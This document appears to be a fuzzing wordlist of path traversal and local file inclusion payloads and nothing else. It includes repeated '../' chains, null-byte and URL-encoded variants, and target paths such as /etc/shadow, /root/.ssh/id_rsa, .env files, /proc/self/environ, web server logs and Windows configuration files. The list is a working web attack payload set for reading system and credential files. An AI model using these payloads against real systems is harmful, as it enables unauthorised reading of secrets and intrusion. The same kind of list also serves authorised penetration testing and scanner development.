../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../etc/passwd%00.jpg
../../etc/passwd%00.jpg
....//etc/passwd
....////etc/passwd
....\/etc/passwd
..\/etc/passwd
..\/..\\/etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/issue
/etc/group
/proc/self/environ
/proc/version
/proc/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/exe
/proc/self/cwd
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/nginx/access.log
/var/log/httpd/access_log
/var/log/auth.log
/var/log/syslog
/var/log/messages
/tmp/sess_1234567890
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/var/www/html/.env
/var/www/.env
%2fetc%2fpasswd
%2F%2Fetc%2Fpasswd
%252fetc%252fpasswd
..%2Fetc%2Fpasswd
..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..\/..\/etc/passwd
..\\..\\ etc\\hosts
C:\Windows\system.ini
C:\Windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:/Windows/system.ini
C:/Windows/win.ini
C:/boot.ini
C:/inetpub/wwwroot/web.config
/windows/win.ini
/winnt/win.ini
\..\..\etc\passwd
\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
....\\etc\\passwd
